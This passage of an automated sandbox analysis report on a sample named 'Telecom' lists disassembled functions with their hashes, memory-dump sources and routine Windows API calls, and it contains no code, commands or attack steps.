Opcode Fuzzy Hash: 190f44faffa3e9f25b49560f42e85b1bf689ac9bc34fdc2ed8026d49370dd1e7
Instruction Fuzzy Hash: FA32B074A00206AFEF10CF55C8D4ABABBB5FF44314F19806BE916AB361C738AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044B570 Relevance: 1.9, APIs: 1, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb18c085d84437bbe338b79beead23c6aa615beb180225a937fddbc45fb31ff
Instruction ID: 5863bf3738c23a2c15c3eb59710fdb622e75783d61d70cc1798fea286fbc1c21
Opcode Fuzzy Hash: 3fb18c085d84437bbe338b79beead23c6aa615beb180225a937fddbc45fb31ff
Instruction Fuzzy Hash: FCE1B1719001199BEF14DF98C880AFEB7B5FF44304F54852BE812AB291E73DDA41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004C7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 04e6c3134d654299abfbe7d764c6c3465011868f1973786c9d57abf2feae151f
Instruction ID: 224140e2c2ddcbf7441545c9c4d7c36a058bcb23f3f717e241090771bed609b1
Opcode Fuzzy Hash: 04e6c3134d654299abfbe7d764c6c3465011868f1973786c9d57abf2feae151f
Instruction Fuzzy Hash: 27D16934A042099FDB14EF95C481EAEBBB5FF48314F14405EE915AB391EB34AD42CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0046F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 870d250f3cfffd20416cb779981bfa928637d0ae1d7e4faba1473e73765f13c2
Instruction ID: 21b22bf4f4b1177412829b03827d7a75d0b994df3d7fbfdce4beb92fdcb42a42
Opcode Fuzzy Hash: 870d250f3cfffd20416cb779981bfa928637d0ae1d7e4faba1473e73765f13c2
Instruction Fuzzy Hash: AD518E35A00104AFCB00CF59E850BAA3BA1EF85364F05C1AAE8989B341E736ED46CF56

Uniqueness

Uniqueness Score: -1.00%

Function 004AFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004AFCCE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 4842355868b8288e92bd6068d2f3fb6c666f61a4989f0f8457449e2426f863ba
Instruction ID: d47457cfa82f95ff9ef3427bb08e1665044e9f0495ebda4e312d8cfd47a177c8
Opcode Fuzzy Hash: 4842355868b8288e92bd6068d2f3fb6c666f61a4989f0f8457449e2426f863ba
Instruction Fuzzy Hash: 4D41C3B2900209AFDB119FA9C8809AFB7B9EF55314B10453FE51397291EB74DA098B54

Uniqueness

Uniqueness Score: -1.00%

Function 00446679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044664A
Part of subcall function 0044663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0044665C
Part of subcall function 0044663E: FreeLibrary.KERNEL32(00000000,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004462FA,?,00000001,?,?,00000000), ref: 004466AB

Part of subcall function 00446607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446610
Part of subcall function 00446607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00446622
Part of subcall function 00446607: FreeLibrary.KERNEL32(00000000,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446635

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: d5fd80a2b9986333cfd8915da0ea70bbb8224790ea60a344bf0649ce4d0ab030
Instruction ID: 2a70e999a2e3849817ab3b738b12500c5dadc1d04ae2cfa1f4278268ea5894d3
Opcode Fuzzy Hash: d5fd80a2b9986333cfd8915da0ea70bbb8224790ea60a344bf0649ce4d0ab030
Instruction Fuzzy Hash: 14113A71600205ABEF14BF22CC02BAD7BA19F51708F12482FF442A61C2EE7DDA05DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00478782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004787C0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1741948043b499cdd8e68a71cba724bc25a7c08b48b63007a52f893120cdfe5c
Instruction ID: ed4961cbb706d603f16f81117d478fa15e553368018b7c01345d173dc433bb8c
Opcode Fuzzy Hash: 1741948043b499cdd8e68a71cba724bc25a7c08b48b63007a52f893120cdfe5c
Instruction Fuzzy Hash: 7D115A7690410AAFCF15DF58E9449DF7BF4EF48304F1180AAF809AB311DA31EA11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B120 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,00446CC0,?,00010000,00000000,00000000,00000000,00000000), ref: 0044B17C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e3a2f0f82f6e652c3bd20ea8fd1064614011aa6f0c29096d9bc564034664f9f7
Instruction ID: 0cb2eab8b9efedc2fec4c928443b13dd47b4359e6cde9f9d66fcc8f2abbfd3f1
Opcode Fuzzy Hash: e3a2f0f82f6e652c3bd20ea8fd1064614011aa6f0c29096d9bc564034664f9f7
Instruction Fuzzy Hash: FB115E312007059FE720CF15C890B67B7E9EF45794F10C42EE8AA8A651C774F845CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00475373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00474FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0047319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00475031

_free.LIBCMT ref: 004753DF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: 8b553b94fc972ffccbdb7a9746f89fc7f334f77e3385e8785fceddcd133d4b07
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: F0014E721003446BE3358F55D84199AFBEDEB85370F25461EE58887280EBB46805C778

Uniqueness

Uniqueness Score: -1.00%

Function 0046E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 26e2939c49e94af37121adaf084ecf388fa9cc2d50babf93285d9632088b7ea7
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 2FF0F9B6500A1056D6313A279C0579B33D88F42338F14471FF529972D1FABCE80686DF

Uniqueness

Uniqueness Score: -1.00%

Function 00474FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0047319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00475031

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 15c5cd3182ddc93f5f55d9b19a2e60feb7c8a434d4a9bc09331494de5fc7b0f7
Instruction ID: 111f513173ac9dd7667dc31993ce809d73c7a1ff8b440912b2e38698930be3a4
Opcode Fuzzy Hash: 15c5cd3182ddc93f5f55d9b19a2e60feb7c8a434d4a9bc09331494de5fc7b0f7
Instruction Fuzzy Hash: 2CF0B432551E60A69B312A66DD01ADB3748AF417A0F14C027B81CDF290EAACD80146EA

Uniqueness

Uniqueness Score: -1.00%

Function 00473B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d17a882a94d91fe44e39c77fb5c6c63b6157c807e5623644ab3ee75ed79f73c6
Instruction ID: 6aca9b69b088ac22dba8f755624a5ab024f95d9ba1e4144cef6948996bfc03be
Opcode Fuzzy Hash: d17a882a94d91fe44e39c77fb5c6c63b6157c807e5623644ab3ee75ed79f73c6
Instruction Fuzzy Hash: CAE0E521250620A6DB303E739C01BDB36489F413A2F148167EC4C96292DB2CFE41A5AE

Uniqueness

Uniqueness Score: -1.00%

Function 004466E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a030ceaca06761df1c20b17b597b9940e00b249b98cf6f2f48e6ee3ddc0cc3
Instruction ID: 5584e8fb883192b3206c55041b9cba348302cb629f766a5b6347583c0e109103
Opcode Fuzzy Hash: f7a030ceaca06761df1c20b17b597b9940e00b249b98cf6f2f48e6ee3ddc0cc3
Instruction Fuzzy Hash: 4BF0A9B0101702CFDB389FA0D8A081BBBE4BF013293218D3FE1DA82610C7399880CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0044684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00446868

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 3546b2b014cc88f35133d6c6db0e84e0762a5c1c2dbf1d1be635acdb75ec0361
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 91F0F87550020DFFDF05DF90C941E9E7BB9FB04318F208449F9159A251D33AEA22ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 004AD5AA Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,004841D5,00504600,00000002), ref: 004AD5D1

Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,004AD5C4,?,?,?), ref: 004AD504
Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,004AD5C4,?,?,?,?,004841D5,00504600,00000002), ref: 004AD519
Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,004AD5C4,?,?,?,?,004841D5,00504600,00000002), ref: 004AD525

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 96f5a814df69a41b15158de5ca39eca932a701e20285d17d4d9dfe19362caf52
Instruction ID: 71b244fe1016791a8f320725489ecccf9e2a2d93628a4fdcd1c263c6274af7ff
Opcode Fuzzy Hash: 96f5a814df69a41b15158de5ca39eca932a701e20285d17d4d9dfe19362caf52
Instruction Fuzzy Hash: B0E03976800604FFCB219F5AD84089AB7F8FF85320310852FE95682510D7B5AA04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00443907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00443963

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: a8bbe41b68e7447092b4217e93491864aaf3346d3b2f0c3fea0121ea83cdde88
Instruction ID: 413c108692264939e52e1a70f0b1473215aca4f3a483caf1baae07bfb274a643
Opcode Fuzzy Hash: a8bbe41b68e7447092b4217e93491864aaf3346d3b2f0c3fea0121ea83cdde88
Instruction Fuzzy Hash: 58F0A7B09003049FE7529F24DC457D67BBCA70170CF0040AAA24496281D774479CCF45

Uniqueness

Uniqueness Score: -1.00%

Function 0045F18B Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,?,0044B1AE,?,?,00000000,?,00446CC0,?), ref: 0045F1A5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 08b76722d3862351c2d027e7f89620b002780940ac2001ed75274035c9ac02c9
Instruction ID: d3c538042de9279abeaca1a35b99b8ef8c6d0b17b071d5fa21aac9262e46794b
Opcode Fuzzy Hash: 08b76722d3862351c2d027e7f89620b002780940ac2001ed75274035c9ac02c9
Instruction Fuzzy Hash: 98E092B5910704AFD728DF55D846D9BBBF8EB08310B00456EA85693740E7B1BD448B50

Uniqueness

Uniqueness Score: -1.00%

Function 00443A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00443A76

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 5e90a385b9578d25e28156597cebc485ad732714b6365b5e364478726505b5ee
Instruction ID: 748c2ecde13a0151d031aec0fb1f80ade1c1dc8d18b2791f5cd38b9977282642
Opcode Fuzzy Hash: 5e90a385b9578d25e28156597cebc485ad732714b6365b5e364478726505b5ee
Instruction Fuzzy Hash: 63E0CD72A0012457C710A2599C05FEE77DDDFC87A4F0440B6FC05D7254D974DD808694

Uniqueness

Uniqueness Score: -1.00%

Function 004AE83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 004AE857

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 30c88b479262959cc4fc99e1ee90d60437a86dfc1245cd58f883dc2621e07755
Instruction ID: 237cf33e42d02debbad2e78dc9fc201685cbeaab1028a9629fbc2eda7b46a85a
Opcode Fuzzy Hash: 30c88b479262959cc4fc99e1ee90d60437a86dfc1245cd58f883dc2621e07755
Instruction Fuzzy Hash: 0BD05EA19002283BEF60A6759C0DDBB3AACC740214F0006A5786DD3152EA34EE4486A4

Uniqueness

Uniqueness Score: -1.00%

Function 00447AAB Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,00000000,00483A42), ref: 00447ACB

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 07f35687f6d35359a4c571fb1bb5eac66522e92f6a285f238d20904c04ee05aa
Instruction ID: 7be4e7a5475d560a0286ac31e8b89db221ad54a690cc6f15a5c99d7c7cffe0ad
Opcode Fuzzy Hash: 07f35687f6d35359a4c571fb1bb5eac66522e92f6a285f238d20904c04ee05aa
Instruction Fuzzy Hash: CAE0B675404B01DFD7318F2AE804416FBF4FFD13613204A2FD5E5A2660D3B45986CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004ADB47 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

